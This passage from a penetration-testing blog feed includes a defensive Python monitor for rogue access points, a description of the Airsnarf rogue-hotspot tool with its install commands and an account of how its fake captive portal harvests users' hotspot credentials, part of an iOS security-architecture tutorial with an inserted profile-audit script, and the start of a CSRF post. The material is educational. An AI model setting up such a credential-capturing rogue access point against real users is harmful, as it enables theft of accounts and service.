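    bssid: str         # MAC address of the access point
    gateway_mac: str   # MAC address currently resolved for the default gateway
    rssi_dbm: int      # received signal strength in dBm (-40 is strong, -80 weak)


class HotspotMonitor:
    """Trusts the first sample and compares every later sample against it."""

    def __init__(self, max_rssi_jump_db: int = 20) -> None:
        self.baseline: Optional[Sample] = None
        self.previous: Optional[Sample] = None
        self.max_rssi_jump_db = max_rssi_jump_db

    def check(self, s: Sample) -> List[str]:
        """Return the alerts raised by this sample (empty list if all is well)."""
        alerts: List[str] = []
        if self.baseline is None or self.previous is None:
            # The first observation is trusted; everything after is compared to it.
            self.baseline = s
            self.previous = s
            return alerts

        b = self.baseline
        if s.essid != b.essid:
            alerts.append(f"t={s.t}: ESSID changed {b.essid!r} -> {s.essid!r}")
        if s.bssid.lower() != b.bssid.lower():
            alerts.append(f"t={s.t}: access point MAC changed {b.bssid} -> {s.bssid}")
        if s.gateway_mac.lower() != b.gateway_mac.lower():
            # Same ESSID/BSSID but a new gateway MAC is the classic ARP poisoning symptom.
            alerts.append(
                f"t={s.t}: default gateway MAC changed {b.gateway_mac} -> {s.gateway_mac} "
                "(possible ARP poisoning or rogue AP)"
            )
        # A sudden large signal swing suggests a different, closer transmitter.
        jump = abs(s.rssi_dbm - self.previous.rssi_dbm)
        if jump > self.max_rssi_jump_db:
            alerts.append(f"t={s.t}: signal jumped {jump} dB between samples")

        self.previous = s
        return alerts


def run_monitor(samples: List[Sample]) -> List[str]:
    """Feed all samples through one monitor and collect every alert raised."""
    mon = HotspotMonitor()
    alerts: List[str] = []
    for s in samples:
        alerts.extend(mon.check(s))
    return alerts


# Constructed sample data: a legitimate hotspot, then the gateway MAC is
# swapped, then an evil twin with the same ESSID appears with a much stronger
# signal. MAC addresses and network name are made up for the example.
SAMPLES = [
    Sample(0,  "CoffeeShop-WiFi", "00:11:22:33:44:55", "00:11:22:33:44:55", -62),
    Sample(10, "CoffeeShop-WiFi", "00:11:22:33:44:55", "00:11:22:33:44:55", -60),
    Sample(20, "CoffeeShop-WiFi", "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF", -61),  # gateway MAC changed
    Sample(30, "CoffeeShop-WiFi", "AA:BB:CC:DD:EE:FF", "AA:BB:CC:DD:EE:FF", -35),  # new AP, strong signal
]

if __name__ == "__main__":
    for line in run_monitor(SAMPLES):
        print(line)
```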
<br />
Airsnarf has been tested with (i.e. probably requires) the following:<br />
<br />
<br />
<ul>
<li>Red Hat Linux 9.0 - http://www.redhat.com/</li>
<li>kernel-2.4.20-13.9.HOSTAP.i686.rpm - http://www.cat.pdx.edu/~baera/redhat_hostap/</li>
<li>iptables - Red Hat 9.0 CD 1</li>
<li>httpd - Red Hat 9.0 CD 1</li>
<li>dhcp - Red Hat 9.0 CD 2</li>
<li>sendmail - Red Hat 9.0 CD 1</li>
<li>Net::DNS Perl module - http://www.cpan.org/</li>
</ul>
<br />
<br />
Install & run Airsnarf with the following commands:<br />
<br />
<i><span style="color: purple;">tar zxvf airsnarf-0.2.tar.gz</span></i><br />
<i><span style="color: purple;">cd ./airsnarf-0.2</span></i><br />
<i><span style="color: purple;">./airsnarf</span></i><br />
<br />
How does it work? Basically, it's just a shell script that uses the above software to create a competing hotspot complete with a captive portal. Variables such as local network, gateway, and SSID to assume can be configured within the ./cfg/airsnarf.cfg file. Optionally, as a command line argument to Airsnarf, you may specify a directory that contains your own airsnarf.cfg, html, and cgi-bin. Wireless clients that associate to your Airsnarf access point receive an IP, DNS, and gateway from you--just as they would any other hotspot. Users will have all of their DNS queries resolve to your IP, regardless of their DNS settings, so any website they attempt to visit will bring up the Airsnarf "splash page", requesting a username and password. The username and password entered by unsuspecting users will be mailed to root@localhost. The reason this works is 1) legitimate access points can be impersonated and/or drowned out by rogue access points and 2) users without a means to validate the authenticity of access points will nevertheless give up their hotspot credentials when asked for them.<br />
<br />
So what's the big deal? Well, with a setup like Airsnarf one can obviously create a "replica website" of many popular, nationally recognized, "pay to play" hotspots. That's as simple as replacing the index.html file Airsnarf uses with your own custom webpage that still points its form field variables to the airsnarf.cgi. Combined with sitting at or near a real hotspot, hotspot users will associate and unknowingly give out their username and password for the hotspot provider's network. The usernames and passwords can then be misused at will to utilize other hotspots of the same provider, possibly anywhere in the nation, leaving the original duped user to pay the bill. Should the user be charged per minute usage, they may recognize something is terribly wrong when they get their next bill. If the user pays a flat rate for unlimited usage, the user may never realize their credentials have been captured and are being misused.<br />
<br />
<br />
Wireless hotspot operators should consider the following: stronger authentication mechanisms, one-time authentication setups, monitoring the existence and creation of APs, and perhaps just giving away hotspot access for free to remove any user service theft risks.<br />
<br />
<b>To Be Continued... </b><br />
<br />
<b>References:</b><br />
<ol>
<li><a href="http://en.wikipedia.org/wiki/Wireless_security">http://en.wikipedia.org/wiki/Wireless_security</a></li>
<li><a href="http://www.kimiushida.com/bitsandpieces/articles/attacking_ssl_with_sslsniff_and_null_prefixes/index.html">http://www.kimiushida.com/bitsandpieces/articles/attacking_ssl_with_sslsniff_and_null_prefixes/index.html</a> </li>
<li><a href="http://www.thoughtcrime.org/software/sslsniff/">http://www.thoughtcrime.org/software/sslsniff/</a> </li>
<li><a href="http://monkey.org/~dugsong/dsniff/">http://monkey.org/~dugsong/dsniff/</a> </li>
<li><a href="http://ettercap.github.com/ettercap/">http://ettercap.github.com/ettercap/</a></li>
<li><a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">http://www.irongeek.com/i.php?page=security/ettercapfilter</a></li>
<li><a href="http://codebutler.com/firesheep/">http://codebutler.com/firesheep/</a></li>
<li><a href="http://tools.ietf.org/html/rfc6797#section-2.3.1">http://tools.ietf.org/html/rfc6797#section-2.3.1</a></li>
<li><a href="http://resources.infosecinstitute.com/pentesting-iphone-applications/" target="_blank">http://resources.infosecinstitute.com/pentesting-iphone-applications/ </a><b> </b></li>
<li><a href="http://airsnarf.shmoo.com/">http://airsnarf.shmoo.com/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-72102545546231866642013-03-09T15:38:00.002-08:002013-03-11T13:54:02.034-07:00The Hackers Guide To Dismantling IPhone (Part 1)<br />
<br />
<b>Introduction</b><br />
<br />
Hello everybody, it has been a while since I made a post, but this time it is going to be a really long post (that is why I am going to break it into many parts). Lately my interest in the iOS platform has increased significantly. iOS is becoming more and more popular among companies in the financial business sector, so the time has come for me to expand my knowledge of iPhone devices. Plus, since the complete industrialization of hacking (mostly because of the Chinese government; unit something is doing a good job), nowadays knowledge of the iOS platform is critical (they pay good money for iHacking). This post is going to include only hardening information and explain what the security measures are that block exploits and prevent buffer overflows etc. The second post is going to include network attacks and the third post is going to include attacks on the data of an iDevice.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FiHnl6XqfUrSpIw2_Sc3N4MBS_SRfWNgvk_WTEVBAcDp1Z7nFC3Py1QOdC2APujPZXiBEGyQ_UEEa0vbmvR6UNWSIFO-HcMSR7vZe_7t3B1EoGF2KEXKpdT6htZ9WrZUYfqA1y-odGQ/s1600/iPhone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FiHnl6XqfUrSpIw2_Sc3N4MBS_SRfWNgvk_WTEVBAcDp1Z7nFC3Py1QOdC2APujPZXiBEGyQ_UEEa0vbmvR6UNWSIFO-HcMSR7vZe_7t3B1EoGF2KEXKpdT6htZ9WrZUYfqA1y-odGQ/s1600/iPhone.jpg" height="244" width="320" /></a></div>
<br />
<b>Note:</b> iOS is the most advanced OS for mobile devices ever created (just kidding, I love Apple).<br />
<br />
This blog post is going to focus on how to perform a complete penetration test on an iOS application; no time is going to be wasted on how to pentest the server component, since the threat landscape is almost identical to that of a Web Application or a Web Service, and since you read my blog (if you don't, start doing it) you should know by now that I have covered most types of attacks for Web Applications and Web Services so far.<br />
<br />
<b>The iOS history</b><br />
<br />
Since the release of the original iPhone in 2007, Apple has engaged in a cat-and-mouse game with hackers to secure their suite of devices for what has grown to nearly 100 million end users. Over this time, many improvements have been made to the security of the iOS, and the stakes have been raised by their introduction into circles with far greater security requirements.<br />
<b><br /></b>
<b>What iOS is</b><br />
<br />
iOS is Apple's mobile operating system, which is derived from Mac OS X, <u>with which it shares the Darwin foundation, and is therefore a Unix-like operating system</u>. Originally developed for the iPhone, it has since been used on the iPod Touch, iPad and Apple TV as well. So in this article the term iOS specifically refers to the mini operating system that runs on all the iDevices (iPhone, iPod, iPad and Apple TV). In this little Apple operating system there are four abstraction layers: <u>the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer</u>, which in total use roughly 500 megabytes of the device's storage.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBAldVCYlht1oMxtB36QfU0xUQopKQ0y6p4Q_Hg9W0iofMqZVoevs8JYvi6yD6uo2CDIc53jt_8vBMmQn-0oV7-yEuzPztBKYtfAZjE83QRrRdWK0Qm7K0sNWCuY2WAjSKmnZHaSM5t-Q/s1600/ios-technology-stack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBAldVCYlht1oMxtB36QfU0xUQopKQ0y6p4Q_Hg9W0iofMqZVoevs8JYvi6yD6uo2CDIc53jt_8vBMmQn-0oV7-yEuzPztBKYtfAZjE83QRrRdWK0Qm7K0sNWCuY2WAjSKmnZHaSM5t-Q/s1600/ios-technology-stack.png" height="352" width="640" /></a></div>
<br />
<b>Note:</b> The Core OS layer is written in C, while the higher layers, which run all the interesting applications, are written in Objective-C. The higher layers are the most interesting as far as attacks are concerned.<br />
<br />
For security and commercial reasons and considerations, Apple does not permit the OS to run on third-party hardware and also limits the usage of iOS on these iDevices. Therefore iOS has been subject to a variety of different hacking methods focusing on adding functionality not supported by Apple. This hacking procedure is called iOS Jailbreak.<br />
<br />
<b>The iOS security architecture</b><br />
<br />
While designing the iOS operating system, Apple decided to increase security by using various "<i>tricks</i>" (obviously iOS is based on the same core technologies as OS X) to reduce the attack surface. The attack surface is the code that processes attacker-supplied input (e.g. SMS messages, Safari web pages etc.). One of the many ways it did that was by not including various software packages in iOS (e.g. Java and Flash are unavailable). This automatically translates to iOS not processing Java and Flash input (Java and Flash have a history of security vulnerabilities). Another trick Apple used to reduce the attack surface was to strip off part of the functionality provided by the default software that comes installed with iOS (e.g. Mobile Safari does not support some Adobe features). iOS was also stripped of many applications compared to OS X, e.g. /bin/sh is not included in iOS, which means that if you write an exploit for iOS you would have to bring your own shell along with the exploit, increasing its size.<br />
<br />
<b>More on iOS security</b><br />
<br />
Some of the core security features referenced per layer are: <br />
<ul>
<li><b>System architecture:</b> The secure platform and hardware foundations of iPhone, iPad, and iPod touch.</li>
<li><b>Encryption and Data Protection:</b> The architecture and design that protects the user’s data when the device is lost or stolen, or when an unauthorized person attempts to use or modify it.</li>
<li><b>Network security:</b> Industry-standard networking protocols that provide secure authentication and encryption of data in transmission.</li>
<li><b>Device access:</b> Methods that prevent unauthorized use of the device and enable it to be remotely wiped if lost or stolen<b>.</b></li>
</ul>
Layered security mechanisms allow for the validation of activities across all layers of the device. From initial boot-up to iOS software installation and through to third-party apps, each step is analyzed and vetted to ensure that each activity is trusted and uses resources properly.<br />
<br />
The following picture shows the security model of iOS, as described above:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM34zjRly62cW8UP6r2zYVwL06gcWQwQ-tamRnrTpPz_S8eWmIpiS7rVeX5wzbjEGsRjoVEZkOnUxxN_UxjpAQgFWjZ0hCCtqT14aaeaEuNoNfPC9sm3VQxtpRjQCSD8z7sVd7cTp-NY4/s1600/secarch.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM34zjRly62cW8UP6r2zYVwL06gcWQwQ-tamRnrTpPz_S8eWmIpiS7rVeX5wzbjEGsRjoVEZkOnUxxN_UxjpAQgFWjZ0hCCtqT14aaeaEuNoNfPC9sm3VQxtpRjQCSD8z7sVd7cTp-NY4/s1600/secarch.jpg" height="640" width="312" /></a></div>
<br />
<b>Note:</b> Check out that the Apple root certificate is installed in the iDevice's ROM, and that iDevices contain their own hardware crypto engines (impressive, eh?). Once the system is running, this integrated security architecture depends on the integrity and trustworthiness of XNU (the iOS kernel). XNU enforces security features at run-time and is essential to being able to trust higher-level functions and apps.<br />
<br />
<b>More More on iOS security</b><br />
<br />
Apple takes security very seriously and this is obvious from the security controls that are enforced during the execution of third-party applications and iOS default pre-installed applications. The security controls explained here are required knowledge to understand how to pentest an iDevice and, later on, to set the threat landscape. iOS basically enforces Mandatory Access Control (MAC) using the security controls explained below. <br />
<br />
<u>The security controls enforced are listed below: </u><br />
<br />
<b>Least Privilege Principle:</b> System files and resources are also shielded from the user’s apps. The majority of iOS runs as the non-privileged user "<i>mobile</i>",
as do all third-party apps. The entire OS partition is mounted
read-only. Unnecessary tools, such as remote login services, aren’t
included in the system software, and APIs do not allow apps to escalate
their own privileges to modify other apps or iOS itself.<br />
<br />
Access by third-party apps to user information and features such as iCloud is controlled using declared entitlements. <u>Entitlements are key/value pairs that are signed into an app and allow authentication beyond run-time factors like the Unix user ID.</u> Since entitlements are digitally signed, they cannot be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system application or daemon.<br />
<br />
<b>Code Signing:</b> To ensure that all apps come from a known and approved source and have not been tampered with, iOS requires that all executable code be signed using an Apple-issued certificate. <u>Now given that individual developers need to test out their applications on iDevices and enterprises need to distribute apps just to their devices, there is a need to run apps without being signed by Apple</u>.<u> The method to allow this is called provisioning.</u> An individual developer, a company, an enterprise or a university may sign up for one or more of the programs offered by Apple for this reason, in order to enable signing their code.<br />
<br />
As part of the program, each developer generates a certificate request for a development and a distribution certificate from a set of private keys generated locally (e.g. by using openssl or a local certificate authority etc.). Apple then replies back with these two certificates. For more information see iOS <a href="https://developer.apple.com/programs/ios/" target="_blank">developer program link</a>.<br />
<br />
Through the iOS developer portal you can then generate a provisioning profile. <u>A provisioning profile is nothing more than a .plist file signed by Apple. All the .plist file does is list certificates, devices and entitlements (entitlements are configuration files describing what an app is allowed and not allowed to do).</u> This provisioning profile is installed e.g. through the iPhone Configuration Utility or third-party Mobile Device Management software.<br />
<br />
The developer provisioning profile can be used only for 100 devices (the devices have to be listed explicitly), while the enterprise provisioning profile does not have that limitation. <u>Essentially provisioning adds accountability to all the apps that are allowed to be installed on an iDevice.</u> <br />
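To show what a provisioning profile actually grants, here is an added example (not Apple's tooling and not from the original post) that extracts the embedded plist from a .mobileprovision blob and audits it against the points above: device list size versus the 100-device limit, the enterprise "all devices" case, entitlements and expiry. It assumes the key names found in real profiles (ProvisionedDevices, ProvisionsAllDevices, Entitlements, ExpirationDate, DeveloperCertificates), does not verify Apple's signature, and the profile bytes are constructed.

```python
"""
Added example: extract and audit the plist inside a provisioning profile.

A .mobileprovision file is a CMS (PKCS#7) signed blob whose signed content is
an XML property list. This code does NOT verify Apple's signature (that needs
Apple's certificate chain and a CMS library); it only pulls out the embedded
plist, which is enough to review which devices, certificates and entitlements
a profile carries before it is pushed to a fleet via MDM.
"""
import plistlib
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional

DEVELOPMENT_DEVICE_LIMIT = 100  # developer profiles list at most 100 devices


def extract_plist(blob: bytes) -> Dict[str, Any]:
    """Locate the XML plist inside a CMS-wrapped profile and parse it."""
    start = blob.find(b"<?xml")
    end = blob.find(b"</plist>")
    if start < 0 or end < 0:
        raise ValueError("no embedded plist found")
    return plistlib.loads(blob[start:end + len(b"</plist>")])


def audit_profile(profile: Dict[str, Any], now: Optional[datetime] = None) -> List[str]:
    """Return human-readable findings about what the profile allows."""
    now = now or datetime.now(timezone.utc)
    findings: List[str] = []
    ents = profile.get("Entitlements", {})
    devices = profile.get("ProvisionedDevices", [])

    if profile.get("ProvisionsAllDevices"):
        findings.append("enterprise profile: installs on ANY device, no device list")
    else:
        findings.append(f"developer profile: {len(devices)} provisioned device(s)")
        if len(devices) > DEVELOPMENT_DEVICE_LIMIT:
            findings.append(f"device list exceeds the {DEVELOPMENT_DEVICE_LIMIT}-device limit")

    if ents.get("get-task-allow"):
        findings.append("get-task-allow is true: a debugger may attach to the app")

    app_id = ents.get("application-identifier", "")
    if app_id.endswith(".*"):
        findings.append(f"wildcard application-identifier {app_id!r}: signs any app of the team")

    exp = profile.get("ExpirationDate")  # plistlib returns a naive UTC datetime
    if exp is not None and exp.replace(tzinfo=timezone.utc) < now:
        findings.append(f"profile expired on {exp.date()}")

    findings.append(f"{len(profile.get('DeveloperCertificates', []))} signing certificate(s) listed")
    return findings


def is_device_provisioned(profile: Dict[str, Any], udid: str) -> bool:
    """True if the profile covers this device (explicitly or via the enterprise wildcard)."""
    if profile.get("ProvisionsAllDevices"):
        return True
    return udid in profile.get("ProvisionedDevices", [])


# Constructed sample: a development profile as it would look once the CMS
# wrapper is stripped. UDIDs, team id and certificate bytes are made up, and
# the surrounding bytes only stand in for the DER envelope.
SAMPLE_PLIST = {
    "Name": "Example Dev Profile",
    "TeamIdentifier": ["ABCDE12345"],
    "ProvisionedDevices": ["0000aaaa" * 5, "1111bbbb" * 5],
    "DeveloperCertificates": [b"\x30\x82\x00\x10constructed-cert-bytes"],
    "Entitlements": {
        "application-identifier": "ABCDE12345.*",
        "get-task-allow": True,
        "keychain-access-groups": ["ABCDE12345.*"],
    },
    "ExpirationDate": datetime(2014, 3, 9, 12, 0, 0),
}
SAMPLE_PROFILE = (
    b"\x30\x82\x0a\x00\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x07\x02"
    + plistlib.dumps(SAMPLE_PLIST)
    + b"\x00" * 8
)

if __name__ == "__main__":
    prof = extract_plist(SAMPLE_PROFILE)
    for finding in audit_profile(prof):
        print("-", finding)
    print("device 0000aaaa... provisioned:", is_device_provisioned(prof, "0000aaaa" * 5))
```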
<br />
The following screenshot shows the IPhone Configuration Utility:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTrEoNHpH2P8eoWW2T74oKFjMz80qeO37kfqECtVDx6rbu5Opdw4gmKP_AkD5uGfsbglfivpcIRcY7f9RlS1978_k5A7SEvgBtYsQBHK7P_pZZAUgds7RK-yQbZgNVkJqiXRoDzJ2nvw/s1600/Screen+Shot+2013-03-09+at+22.05.43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTrEoNHpH2P8eoWW2T74oKFjMz80qeO37kfqECtVDx6rbu5Opdw4gmKP_AkD5uGfsbglfivpcIRcY7f9RlS1978_k5A7SEvgBtYsQBHK7P_pZZAUgds7RK-yQbZgNVkJqiXRoDzJ2nvw/s1600/Screen+Shot+2013-03-09+at+22.05.43.png" height="281" width="320" /></a></div>
<br />
<b>Note:</b> This is obviously not a signed profile; it was configured locally in my iPhone Configuration Utility. <br />
<br />
The following picture shows an installed enterprise configuration profile and how it appears in the iPhone's configuration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWUbXWQds0PpbXevvGYF9VNBQ5X9ivyy5sSuF0rqgYeOklm84JSjvFEWO5y7mB_nMlK7Z2rekgD6WLwjOlUh-hJsUuo04UW69lpi5kc15TEBMTnoOo1SygwuIhLPTzf3eaErZjIfFFJrg/s1600/ios-configuration-profiles.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWUbXWQds0PpbXevvGYF9VNBQ5X9ivyy5sSuF0rqgYeOklm84JSjvFEWO5y7mB_nMlK7Z2rekgD6WLwjOlUh-hJsUuo04UW69lpi5kc15TEBMTnoOo1SygwuIhLPTzf3eaErZjIfFFJrg/s1600/ios-configuration-profiles.png" height="366" width="400" /></a></div>
<br />
<b>Note:</b> See how the certificate shows in the screenshot. This demonstrates the BOMGAR MDM software, which enforces a custom configuration profile. <br />
<br />
<b>Sand-boxing:</b> All third-party apps are "<i>sandboxed</i>", so they are restricted from accessing files stored by other apps or from making changes to the device. This prevents apps from gathering or modifying information stored by other apps. <u>Each app has a unique home directory for its files, which is randomly assigned when the app is installed.</u> If a third-party app needs to access information other than its own, it does so only by using application programming interfaces (APIs) and services provided by iOS. The downside of this security model is that the same rules apply to all apps (a third-party app is not allowed to have more restrictive rules than another).<br />
<br />
<b>Address space layout randomization (ASLR): </b>ASLR protects against the exploitation of memory corruption bugs. Built-in apps use ASLR to ensure that all memory regions are randomized upon launch. Additionally, system shared library locations are randomized at each device start-up. Xcode, the iOS development environment, automatically compiles third-party programs with ASLR support turned on.<br />
<br />
<b>NX Flag:</b> Further protection is provided by iOS using ARM’s Execute Never (XN) feature, which marks memory pages as non-executable. Memory pages marked as both writable and executable can be used only by apps under tightly controlled conditions: The kernel checks for the presence of the Apple-only “dynamic-codesigning” entitlement. Even then, only a single mmap call can be made to request an executable and writable page, which is given a randomized address. Safari uses this functionality for its JavaScript JIT compiler.<br />
<br />
<b>Jailbreaking your iOS</b><br />
<br />
Jailbreaking is a process that allows iDevice users to gain the infamous root access to the command line of the iOS operating system, in order to remove usage and access limitations imposed by Apple. Once jailbroken, iPhone users are able to download extensions and themes that are unavailable through the App Store (via installers such as Cydia) and perform other tasks that are not possible on store-bought devices, including installing non-Apple operating systems such as Linux and multitasking on old iDevices (the new generation of store-bought devices includes this function). Through the authentication server developed by Aurik (a Ph.D. student from UCSB), built to sign old iOS firmware, Cydia creator Jay Freeman estimates that over 10% of all iPhones are jailbroken.<br />
<br />
Tools you can use for jailbreaking your iPhone are listed alphabetically below (found in theiphonewiki.com):<br />
<br />
<ul>
<li>Absinthe</li>
<li>Blackra1n</li>
<li>Corona</li>
<li>Dual Boot Exploit</li>
<li>Evasi0n</li>
<li>Greenpois0n (jailbreak)</li>
<li>IBrickr</li>
<li>ILiberty+</li>
<li>INdependence</li>
<li>JailbreakMe</li>
<li>Limera1n</li>
<li>Mknod</li>
<li>Pwnage</li>
<li>PwnageTool</li>
<li>Ramdisk Hack</li>
<li>Redsn0w</li>
<li>Redsn0w Lite</li>
<li>Restore Mode</li>
<li>Seas0nPass</li>
<li>Sn0wbreeze</li>
<li>Soft Upgrade</li>
<li>Spirit</li>
<li>Star</li>
<li>Symlinks</li>
<li>ZiPhone</li>
</ul>
<br />
<b>Note1:</b> This tutorial was written on 09/March/2013, so updating this list with your own research is also required.<br />
<br />
<b>Note2:</b> The real question here is: do you need to jailbreak your iDevice to pentest it? The answer is that it depends; for example, if the app you are testing has anti-jailbreaking countermeasures then maybe not, and if the app you are testing has no anti-jailbreaking countermeasures then definitely yes. Jailbreaking the testing <u>target iPhone is a must when applicable</u>.<br />
<br />
<b>Setting the threat landscape for iOS </b><br />
<br />
What most iOS developers/security consultants do not understand is the threat landscape currently associated with the iOS platform; it is not clearly defined in their minds, and some of them do not even have a clue what should be taken into consideration when performing a Security Assurance, Risk Assessment or Penetration Test on an iOS related platform. An iDevice should be treated as a thick client on steroids. The features provided by an iOS device are amazing and very rich.<br />
<br />
A good source that can be used as a starting point for developing a threat model for iOS should be the OWASP Mobile Security Project found <a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Project" target="_blank">here</a>. The Top 10 Mobile Risks, Release Candidate v1.0 covers pretty much all risks that are associated with an iOS device. The following picture summarizes all risks identified:<b> </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrtGm_UO-QWbXmxNhCbLJMwVi4AcoqIq5ISJaLEJ-T-PbxpyTW3u5DmZ1qRUovJwFGCJ4AVCQXzgUpOURywlKDhcfP11Kf5WV408ZNvlYAgfnRgR5vxX7epKBtXOd5wIXkGagYxcXIDc/s1600/800px-Topten.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrtGm_UO-QWbXmxNhCbLJMwVi4AcoqIq5ISJaLEJ-T-PbxpyTW3u5DmZ1qRUovJwFGCJ4AVCQXzgUpOURywlKDhcfP11Kf5WV408ZNvlYAgfnRgR5vxX7epKBtXOd5wIXkGagYxcXIDc/s1600/800px-Topten.png" height="403" width="640" /></a></div>
<br />
<b>Note:</b> Risks M2, M5 and M6 are mostly server-side related and I am not going to focus on these issues a lot.<br />
<br />
Risks M1, M4, M8, M7, M9 and M10 are the most interesting of all the issues and I am going to spend a lot of time analyzing them. But before we do that it would be wise to focus a little on the type of interaction an iDevice has with the server component. Given the nature of iOS based devices, and their willingness to blindly accept new configuration, hijacking both cellular traffic and WiFi traffic can usually be performed much more easily than a similar attack on a desktop machine. It is so easy, in fact, that a device's traffic can be hijacked without even compromising the device itself. There are a number of ways to intercept network traffic across local networks; dozens of articles have been written on the subject. <br />
<br />
The following picture shows a typical Web Server iPhone interaction:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8515ZBwH1klCoAIEINI4keVAvqI2gLrJu-lTQfXDNio-ej9A3Tuc3-y3ZMVKxHjEhXnaccwTD52aum5GT7Uc8rQZ4EA0G2-fohx0tbceU1RrKlnVk-MX1eTjBejVGQpzBS4TUzJNdZY/s1600/iPhoneBasic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8515ZBwH1klCoAIEINI4keVAvqI2gLrJu-lTQfXDNio-ej9A3Tuc3-y3ZMVKxHjEhXnaccwTD52aum5GT7Uc8rQZ4EA0G2-fohx0tbceU1RrKlnVk-MX1eTjBejVGQpzBS4TUzJNdZY/s1600/iPhoneBasic.png" height="400" width="211" /></a></div>
<br />
<b>Note:</b> This is a simple Web Server, iPhone interaction.<br />
<br />
The following picture shows typical attack scenarios that can be implemented very easily by exploiting the iPhone's configuration of blindly accepting any wireless access point. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpnd1ILt3cHRR1cH8VYQUigq4hOPtoJ-_xmtsViOsMlPNNuRPXj4ojW6AmfXTa69HHq_Ffp2FBR4BxC9ZJcgz9dRuWpmSCZJXqFBn2zMZ52c0QDRmG7XBD1F9Gejp6LLtQpr_7WMCB-80/s1600/Screen+Shot+2013-03-06+at+22.23.03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpnd1ILt3cHRR1cH8VYQUigq4hOPtoJ-_xmtsViOsMlPNNuRPXj4ojW6AmfXTa69HHq_Ffp2FBR4BxC9ZJcgz9dRuWpmSCZJXqFBn2zMZ52c0QDRmG7XBD1F9Gejp6LLtQpr_7WMCB-80/s1600/Screen+Shot+2013-03-06+at+22.23.03.png" height="320" width="271" /></a></div>
<br />
The following picture shows typical <b>Man In The Middle</b> attack scenarios that can again be implemented very easily due to the nature of mobile devices (which, by the way, are mobile).<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM8VV54qpTyeL_uxZ5nkXULCFXZqzyPoJSSL65umsPG1vQWu7TyQb_zkaAU2Q5I2eEjB68njI_jDpJHe_5S3ZgTd_zq5Fk-WgVSJ8eyzhwUXjdf6YBVaROa0uJ7bhNA8Cj9xxkEM5rTzA/s1600/Screen+Shot+2013-03-09+at+23.33.12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM8VV54qpTyeL_uxZ5nkXULCFXZqzyPoJSSL65umsPG1vQWu7TyQb_zkaAU2Q5I2eEjB68njI_jDpJHe_5S3ZgTd_zq5Fk-WgVSJ8eyzhwUXjdf6YBVaROa0uJ7bhNA8Cj9xxkEM5rTzA/s1600/Screen+Shot+2013-03-09+at+23.33.12.png" height="400" width="382" /></a></div>
<b><br /></b>
<b>Note:</b> The types of attacks that can be performed using the methodology of a rogue access point or the Man In The Middle attack scenarios are going to be explained in the next post.<br />
<br />
<b>Epilogue</b><br />
<br />
This article covered the threat landscape for iDevices, which is identical for all mobile devices (e.g. iPhone, iPad, iTouch, iPad mini, Android devices etc.). The next part is going to cover Internet/Wireless attacks and the third is going to cover iDevice data attacks (e.g. attacking unencrypted and encrypted data). There might though be a fourth part that sums up all attack patterns together.<br />
<br />
<b>See part 2 </b><br />
<br />
<h2 style="text-align: left;">CSRFing the Web...</h2>
<div>Published 2012-12-26 (updated 2013-09-23).</div>
<b>Introduction</b><br />
<div>
<br />
Nowadays hacking, as already mentioned in my previous articles, has been industrialized: professional hackers are constantly hired to make money out of practically anything, and therefore all Web Application vulnerabilities have to be understood and defeated. <br />
<br />
